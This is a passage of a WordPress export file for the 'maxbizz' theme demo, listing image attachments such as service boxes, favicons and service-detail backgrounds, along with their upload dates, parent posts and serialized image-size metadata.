:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box5</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/service-box5/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>906</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box5.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box5-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box5-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box5-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"service-box5-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"service-box5-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box6</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/service-box6/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>907</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/09/service-box6.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box6-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box6-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box6-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box6-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"service-box6-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"service-box6-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart1-service</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/chart1-service/</link>
		<pubDate>Mon, 14 Sep 2020 09:39:03 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart1-service.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>913</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 09:39:03]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 09:39:03]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart1-service]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart1-service.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart1-service.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:466;s:6:"height";i:296;s:4:"file";s:26:"2020/09/chart1-service.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:26:"chart1-service-300x191.png";s:5:"width";i:300;s:6:"height";i:191;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"chart1-service-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:26:"chart1-service-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"chart1-service-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>cropped-favicon.jpg</title>
		<link>http://wpdemo.archiwp.com/maxbizz/cropped-favicon-jpg/</link>
		<pubDate>Wed, 16 Sep 2020 09:42:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/cropped-favicon.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[https://maxbizz.s3.amazonaws.com/images/cropped-favicon.jpg]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>930</wp:post_id>
		<wp:post_date><![CDATA[2020-09-16 09:42:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-16 09:42:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[cropped-favicon-jpg]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/cropped-favicon.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/cropped-favicon.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_context]]></wp:meta_key>
		<wp:meta_value><![CDATA[site-icon]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:512;s:6:"height";i:512;s:4:"file";s:27:"2020/09/cropped-favicon.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:27:"cropped-favicon-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"cropped-favicon-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"cropped-favicon-512x400.jpg";s:5:"width";i:512;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:13:"site_icon-270";a:4:{s:4:"file";s:27:"cropped-favicon-270x270.jpg";s:5:"width";i:270;s:6:"height";i:270;s:9:"mime-type";s:10:"image/jpeg";}s:13:"site_icon-192";a:4:{s:4:"file";s:27:"cropped-favicon-192x192.jpg";s:5:"width";i:192;s:6:"height";i:192;s:9:"mime-type";s:10:"image/jpeg";}s:13:"site_icon-180";a:4:{s:4:"file";s:27:"cropped-favicon-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:12:"site_icon-32";a:4:{s:4:"file";s:25:"cropped-favicon-32x32.jpg";s:5:"width";i:32;s:6:"height";i:32;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/bg1-service-detail/</link>
		<pubDate>Wed, 16 Sep 2020 10:07:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>935</wp:post_id>
		<wp:post_date><![CDATA[2020-09-16 10:07:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-16 10:07:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:204;s:4:"file";s:30:"2020/09/bg1-service-detail.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"bg1-service-detail-300x70.jpg";s:5:"width";i:300;s:6:"height";i:70;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"bg1-service-detail-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"bg1-service-detail-768x180.jpg";s:5:"width";i:768;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"bg1-service-detail-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"bg1-service-detail-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>favicon</title>
		<link>http://wpdemo.archiwp.com/maxbizz/favicon/</link>
		<pubDate>Wed, 16 Sep 2020 10:08:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/favicon.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>936</wp:post_id>
		<wp:post_date><![CDATA[2020-09-16 10:08:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-16 10:08:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[favicon]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/favicon.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/favicon.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:41;s:6:"height";i:41;s:4:"file";s:19:"2020/09/favicon.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>cropped-favicon.png</title>
		<link>http://wpdemo.archiwp.com/maxbizz/cropped-favicon-png/</link>
		<pubDate>Wed, 16 Sep 2020 10:09:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/cropped-favicon.png</guid>
		<description></description>
		<content:encoded><![CDATA[https://maxbizz.s3.amazonaws.com/images/cropped-favicon.png]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>937</wp:post_id>
		<wp:post_date><![CDATA[2020-09-16 10:09:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-16 10:09:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[cropped-favicon-png]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/cropped-favicon.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/cropped-favicon.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_context]]></wp:meta_key>
		<wp:meta_value><![CDATA[site-icon]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:512;s:6:"height";i:512;s:4:"file";s:27:"2020/09/cropped-favicon.png";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:27:"cropped-favicon-300x300.png";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"cropped-favicon-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"cropped-favicon-512x400.png";s:5:"width";i:512;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:13:"site_icon-270";a:4:{s:4:"file";s:27:"cropped-favicon-270x270.png";s:5:"width";i:270;s:6:"height";i:270;s:9:"mime-type";s:9:"image/png";}s:13:"site_icon-192";a:4:{s:4:"file";s:27:"cropped-favicon-192x192.png";s:5:"width";i:192;s:6:"height";i:192;s:9:"mime-type";s:9:"image/png";}s:13:"site_icon-180";a:4:{s:4:"file";s:27:"cropped-favicon-180x180.png";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:9:"image/png";}s:12:"site_icon-32";a:4:{s:4:"file";s:25:"cropped-favicon-32x32.png";s:5:"width";i:32;s:6:"height";i:32;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>img-btn-pdf</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/img-btn-pdf/</link>
		<pubDate>Thu, 17 Sep 2020 03:47:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/img-btn-pdf.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>955</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 03:47:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 03:47:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[img-btn-pdf]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/img-btn-pdf.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/img-btn-pdf.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:90;s:4:"file";s:23:"2020/09/img-btn-pdf.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"img-btn-pdf-150x90.jpg";s:5:"width";i:150;s:6:"height";i:90;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/bg1-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 04:10:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>961</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:10:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:10:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:540;s:4:"file";s:31:"2020/09/bg1-service-detail2.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:31:"bg1-service-detail2-300x138.jpg";s:5:"width";i:300;s:6:"height";i:138;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"bg1-service-detail2-1024x471.jpg";s:5:"width";i:1024;s:6:"height";i:471;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:31:"bg1-service-detail2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"bg1-service-detail2-768x353.jpg";s:5:"width";i:768;s:6:"height";i:353;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:31:"bg1-service-detail2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:31:"bg1-service-detail2-600x540.jpg";s:5:"width";i:600;s:6:"height";i:540;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/bg2-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 07:35:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>970</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 07:35:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 07:35:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-service-detail2.jpg]]></wp:meta_value>
